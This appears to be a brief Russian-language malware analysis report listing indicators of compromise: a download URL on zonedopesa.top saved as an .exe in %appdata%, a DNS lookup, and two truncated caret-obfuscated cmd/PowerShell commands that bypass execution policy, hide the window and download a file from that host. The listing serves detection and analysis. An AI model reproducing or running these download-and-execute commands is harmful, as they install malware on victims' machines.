Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^e^rsheL^L^.^Exe ^-Ex^ECUTIon^poL^ic^Y ^byp^As^s ^-^NOpRO^fILE -W^IND^OW^sT^YL^e hI^dd^e^N (New-^o^BjECt sYS^tE^M.Ne^T.wEB^cLI^e^N^t).dow^n^LOADFI^le('http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "po^w^e^rsheL^L^.^Exe ^-Ex^ECUTIon^poL^ic^Y ^byp^As^s ^-^NOpRO^fILE -W^IND^OW^sT^YL^e hI^dd^e^N (New-^o^BjECt sYS^tE^M.Ne^T.wEB^cLI^e^N^t).dow^n^LOADFI^le('http://www.zonedopesa...' (со скрытым окном)